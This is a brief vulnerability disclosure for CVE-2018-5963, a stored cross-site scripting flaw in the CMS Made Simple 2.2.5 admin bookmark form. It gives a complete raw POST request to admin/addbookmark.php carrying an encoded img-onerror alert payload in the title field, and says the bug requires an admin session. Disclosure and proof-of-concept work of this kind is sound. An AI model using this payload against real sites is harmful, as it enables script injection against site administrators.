CMS 2.2.5 Stored Cross-Site Scripting

CVE-2018-5963: CMS Made Simple (CMSMS) 2.2.5 has Stored XSS in admin/addbookmark.php via the title parameter.

Stored XSS

Submitting the request below stores the payload as a bookmark; the injected alert then fires whenever the admin interface renders it:

[Screenshot omitted: alert(1) dialog shown in the CMSMS admin interface, captured 2018-01-22]

The title field of the Add Shortcut (bookmark) form is neither validated on input nor HTML-encoded on output, so the stored value is rendered as markup and the XSS is persistent. The request carries the session's _sk_ secure key in the URL, the cookie and the body, so it has to be issued from an authenticated admin session, which is why this is an admin-only finding.

POST /cmsms-2.2.5-install/admin/addbookmark.php?_sk_=24c1316d9651c78528d HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
Cookie: _sk_=24c1316d9651c78528d; 3e36c2b179d93f0eca459a97b9eda32a=ee958a481d387cb9a7aaddefc767cffddc9b8d8d%3A%3AYTo1OntzOjM6InVpZCI7aToxO3M6ODoidXNlcm5hbWUiO3M6NDoicm9vdCI7czo3OiJlZmZfdWlkIjtOO3M6MTI6ImVmZl91c2VybmFtZSI7TjtzOjU6ImNrc3VtIjtzOjQwOiI0NGU4ZGE0MjYxYTc2MzRhMjdmMjk1OGM5NzUzMzY1OWI1NjYwMDJjIjt9; SQLiteManager_currentLangue=2; CMSICbf982e8ecf=2dca056a03f34ef10994cef9e2b38d05; CMSSESSID6cbb6f8586d9=05871ce0719e96a874da643a9b5dc368
Connection: close
Upgrade-Insecure-Requests: 1

_sk_=24c1316d9651c78528d&title=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&url=adsf&addbookmark=true

I read a lot of papers and websites about this CMS. They don't give a bounty for issues that require the admin role, so I reported it to MITRE and got CVE-2018-5963.

ref:

http://seclists.org/fulldisclosure/2018/Jan/80
